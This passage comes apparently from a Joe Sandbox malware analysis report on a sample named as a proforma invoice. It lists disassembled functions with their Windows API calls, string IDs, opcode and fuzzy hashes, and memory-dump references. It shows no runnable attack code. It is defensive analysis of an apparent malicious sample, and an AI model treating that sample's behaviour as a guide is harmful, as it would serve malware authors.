                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CrackInternet_memset
                                                                                                                    • String ID: |
                                                                                                                    • API String ID: 1413715105-2343686810
                                                                                                                    • Opcode ID: 11d7b9ad361e6b9f3807141cc9b4b7735c28c4f36da499539e3f704ed5faba8a
                                                                                                                    • Instruction ID: caeac654425855b65142b0c77a828af5fd02e827f3b289ca284b102d894ddfcb
                                                                                                                    • Opcode Fuzzy Hash: 11d7b9ad361e6b9f3807141cc9b4b7735c28c4f36da499539e3f704ed5faba8a
                                                                                                                    • Instruction Fuzzy Hash: B4310771C20119EBCF01AFA4DC85EEEBBB9FF08310F100169ED15A6162DA315A69DF60
                                                                                                                    Function 002D7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 002D7B61
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D7B76
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: '
                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                    • Opcode ID: 88c65b923efb08b8c11ada81880d46e6a6d3e382c904f5508f9939a042f2c8df
                                                                                                                    • Instruction ID: 411c802e9ba4e7711784fc13247558027277a1eab7f8511d1b2ed13b6285ecb4
                                                                                                                    • Opcode Fuzzy Hash: 88c65b923efb08b8c11ada81880d46e6a6d3e382c904f5508f9939a042f2c8df
                                                                                                                    • Instruction Fuzzy Hash: DD41F874A1520ADFDB14CF64C981BEABBB9FB09304F10416AE905AB391E774AD51CF90
                                                                                                                    Function 002D6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 002D6B17
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002D6B53
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                    • Opcode ID: e97de9aa269495bad4e81f167f6af61aa7f5bf48898c1faff9ee1db3764ee799
                                                                                                                    • Instruction ID: e9fbe32ef4b3199d69e283b571b73bd2a7550f986e5bace605ec24c57e5879f9
                                                                                                                    • Opcode Fuzzy Hash: e97de9aa269495bad4e81f167f6af61aa7f5bf48898c1faff9ee1db3764ee799
                                                                                                                    • Instruction Fuzzy Hash: BD31C171120204AEDB109F24CC44BFB77B8FF48764F10851AF9A5D7290DB30ACA1CB64
                                                                                                                    Function 002B28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B2911
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002B294C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                    • Opcode ID: b14d086e4842b3b533df38c3333cf84846776018b0d5aed5492bff7ebb37ab5b
                                                                                                                    • Instruction ID: 6099932dea692238dc2fc7d46ec46b00cc1b76d9f9d6f5c15ee1da5efacd4428
                                                                                                                    • Opcode Fuzzy Hash: b14d086e4842b3b533df38c3333cf84846776018b0d5aed5492bff7ebb37ab5b
                                                                                                                    • Instruction Fuzzy Hash: 02312831A20706DFEB25CF48DC85BEEBBF8EF453D0F244019E999A61A0D7709968CB11
                                                                                                                    Function 002D66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002D6761
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D676C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                    • Opcode ID: 135190bddc8e2221944c58ddd04ec188c1dcabb349ec9edc6a7e87121659b76e
                                                                                                                    • Instruction ID: b48736cae8d974ed50ae83b5c36349be82e2ac6aaa9025b644e8e67031431706
                                                                                                                    • Opcode Fuzzy Hash: 135190bddc8e2221944c58ddd04ec188c1dcabb349ec9edc6a7e87121659b76e
                                                                                                                    • Instruction Fuzzy Hash: DC119071320209AFFF118F54DC89EBB776AEB883A8F10412AF91497391D675DC618BA0
                                                                                                                    Function 002D6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
                                                                                                                      • Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
                                                                                                                      • Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002D6C71
                                                                                                                    • GetSysColor.USER32(00000012), ref: 002D6C8B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                    • Opcode ID: ddf482048e0d6f8378614c16e3cb2467b4f709bcdc25a4be30a65fc2c8c38f2b
                                                                                                                    • Instruction ID: fc84c55a6649309b1d3a3ace8aa5e35b72f262040a8a0d483f4bfb98e79cc54f
                                                                                                                    • Opcode Fuzzy Hash: ddf482048e0d6f8378614c16e3cb2467b4f709bcdc25a4be30a65fc2c8c38f2b
                                                                                                                    • Instruction Fuzzy Hash: A8212C7262020AAFDF04DFA8DD49AEA7BB8FB08315F00452AFD55D2250D735E860DB60
                                                                                                                    Function 002D6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 002D69A2
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002D69B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    • Opcode ID: 7ba5bc0ed149b3c3ede0eb03c5996ec197761c15968d965328724cdc840b3f3a
                                                                                                                    • Instruction ID: ff356acedd500e80a464ebb1a9032ccaaa62e885e34674e72f267a6e3f9dab22
                                                                                                                    • Opcode Fuzzy Hash: 7ba5bc0ed149b3c3ede0eb03c5996ec197761c15968d965328724cdc840b3f3a
                                                                                                                    • Instruction Fuzzy Hash: 7611BC71520209ABEB108F74DC68AEB37AAEB053B4F504726F9A1972E0C771DC609B60
                                                                                                                    Function 002B29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B2A22
                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002B2A41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                    • Opcode ID: a915cd34d3862aaa366f07711444ddd25dc407249a6229581fc0106646147543
                                                                                                                    • Instruction ID: a41dbca11019bee225483910cf26a6ed18fad56aa0a1c0b810ea5644e5934327
                                                                                                                    • Opcode Fuzzy Hash: a915cd34d3862aaa366f07711444ddd25dc407249a6229581fc0106646147543
                                                                                                                    • Instruction Fuzzy Hash: B211D032921315EBCB31EF98DC44BEA73ACAB89380F144021E855E7291D770AD1EC792
                                                                                                                    Function 002C21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002C222C
                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002C2255
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                    • Opcode ID: dcb37491f1a02e8bbda2ea56791fb0053a09adffe78bb4b7cf4f7f36c8ba1144
                                                                                                                    • Instruction ID: 1b38990732ce0666bfd38b4e6dfc7f713b033aea8ec747729318d829d7a32818
                                                                                                                    • Opcode Fuzzy Hash: dcb37491f1a02e8bbda2ea56791fb0053a09adffe78bb4b7cf4f7f36c8ba1144
                                                                                                                    • Instruction Fuzzy Hash: B211C170511226FADB258F118C98FF6FBACFB06361F10832EF90546000DAB05968D6F1
                                                                                                                    Function 0026092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00253C14,003152F8,?,?,?), ref: 0026096E
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • _wcscat.LIBCMT ref: 00294CB7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FullNamePath_memmove_wcscat
                                                                                                                    • String ID: S1
                                                                                                                    • API String ID: 257928180-611949105
                                                                                                                    • Opcode ID: 8c038cc7c6ea62d3070696c0b846da24838fafd6e62a0d4b1cf5a810647240aa
                                                                                                                    • Instruction ID: cdc382f3b5805817e6041889c4c420ff0ea99b15b26e16f7ef30602d3b52f629
                                                                                                                    • Opcode Fuzzy Hash: 8c038cc7c6ea62d3070696c0b846da24838fafd6e62a0d4b1cf5a810647240aa
                                                                                                                    • Instruction Fuzzy Hash: 28110834A22209DB8B41FB60DC46FCE73FCEF08750B0044A2B948D3281EAB09BE85F14
                                                                                                                    Function 002A8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002A8E73
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 955f5f93feb8457b768af54f93dd5231e4e5ec595dff08aaf55af345d2d11726
                                                                                                                    • Instruction ID: b17d059d7e4e0bad83b2f56e9a2d3964b456ab830f77515423673168c67aa919
                                                                                                                    • Opcode Fuzzy Hash: 955f5f93feb8457b768af54f93dd5231e4e5ec595dff08aaf55af345d2d11726
                                                                                                                    • Instruction Fuzzy Hash: 7301F5B1A62229EBCB15EBA0CD568FE7368EF02320B004619FC31572E2DF35582CCA50
                                                                                                                    Function 002B8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                    • String ID: EA06
                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                    • Opcode ID: 6ebcc430636675c1374a6686b97d85153ac16b0aad82ef4bdec8e6dd1fd1ea15
                                                                                                                    • Instruction ID: 5b1071d64dfab84c8549a9d54578468e0fce9d2931b4b02a9772ce55e6cde98f
                                                                                                                    • Opcode Fuzzy Hash: 6ebcc430636675c1374a6686b97d85153ac16b0aad82ef4bdec8e6dd1fd1ea15
                                                                                                                    • Instruction Fuzzy Hash: C401F9718142187EDB18CBA8C856EEEBBFCDB15301F00419FF596D2181E9B5A6188B60
                                                                                                                    Function 002A8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 002A8D6B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: c2e00de5270c0c946c2c6696555b0f271e68d27fe32cbc17fb449ee05369b402
                                                                                                                    • Instruction ID: e1ec0d0d9bf1820ce4e0318d2d60f559b129129b4fe8c9c78318b61501a7db20
                                                                                                                    • Opcode Fuzzy Hash: c2e00de5270c0c946c2c6696555b0f271e68d27fe32cbc17fb449ee05369b402
                                                                                                                    • Instruction Fuzzy Hash: 7301FC71A61509ABCB15EBA0C956EFE73B8DF16300F104019BC01671E1DF255E2CDAB5
                                                                                                                    Function 002A8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 002A8DEE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: bd4b15d34072a8e1660241451b91f9c47b88aece11a177bf3d56a2b8f77db8d8
                                                                                                                    • Instruction ID: e96728436fc85187d87c277b480e94a574caf604755e0b6acffba640a8aa1699
                                                                                                                    • Opcode Fuzzy Hash: bd4b15d34072a8e1660241451b91f9c47b88aece11a177bf3d56a2b8f77db8d8
                                                                                                                    • Instruction Fuzzy Hash: 570126B1A62109B7CB11EBB4C956EFE77ACDF12300F104016BC02672D2DE255E2CDAB5
                                                                                                                    Function 002AC4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002AC534
                                                                                                                      • Part of subcall function 002AC816: _memmove.LIBCMT ref: 002AC860
                                                                                                                      • Part of subcall function 002AC816: VariantInit.OLEAUT32(00000000), ref: 002AC882
                                                                                                                      • Part of subcall function 002AC816: VariantCopy.OLEAUT32(00000000,?), ref: 002AC88C
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002AC556
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                    • String ID: d}0
                                                                                                                    • API String ID: 2932060187-215453177
                                                                                                                    • Opcode ID: 9b0e582d3b3d225ee139cbd15630224f365605a3d159ec43a8ea6b426d2d033c
                                                                                                                    • Instruction ID: 84a4fdd3e458de975f682882b76b74c8e6228aa1c968249f9231d78e78af3c51
                                                                                                                    • Opcode Fuzzy Hash: 9b0e582d3b3d225ee139cbd15630224f365605a3d159ec43a8ea6b426d2d033c
                                                                                                                    • Instruction Fuzzy Hash: D8111E719017089FC720DFAAD98489AF7F8FF08310B50862FE58AD7651E771AA48CF94
                                                                                                                    Function 002B4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
